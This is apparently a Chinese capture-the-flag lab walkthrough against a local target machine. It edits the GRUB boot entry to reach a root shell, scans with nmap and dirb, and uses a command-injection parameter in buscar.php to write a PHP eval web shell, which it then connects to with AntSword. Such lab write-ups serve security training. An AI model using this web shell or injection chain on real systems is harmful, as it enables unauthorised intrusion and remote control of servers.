靶机 ip:192.168.152.155
把靶机的网络模式调成和攻击机kali一样的网络模式,我的kali是NAT模式,
在系统启动时(长按shift键)直到显示以下界面 ,我们选第二个,按回车。

继续选择第二个,这次按 e 进入编辑页面

接下来, 删除"recovery nomodeset"并在末尾添加"quiet splash rw init=/bin/bash"

按 F10 或者 ctrl+x 启动
我们 cd 到 etc 下的 network 目录中修改 interfaces 文件(将网卡信息设置为 ens33),重启靶机即可生效。)
cd etc
cd network
vim interfaces

我们使用 nmap -sS 扫描端口

发现他开启了 80 和 21 端口
我们访问一下 80 端口

发现了一个 site 目录,点击进去是一个页面

我们继续使用 dirb 查一下他有什么文件

我们挨个访问一下,assets 是一个图片目录
css 是一个文件目录

访问到 buscar.php 中发现url 框中有参数 buscar=
我们输入一个 id 参数

页面有变化
这时我们就可以写入一个一句话木马
echo '<?php eval($_POST["cmd"]);' > 123.php

我们去访问一下 123.php

访问成功,使用蚁剑连接


获得 shell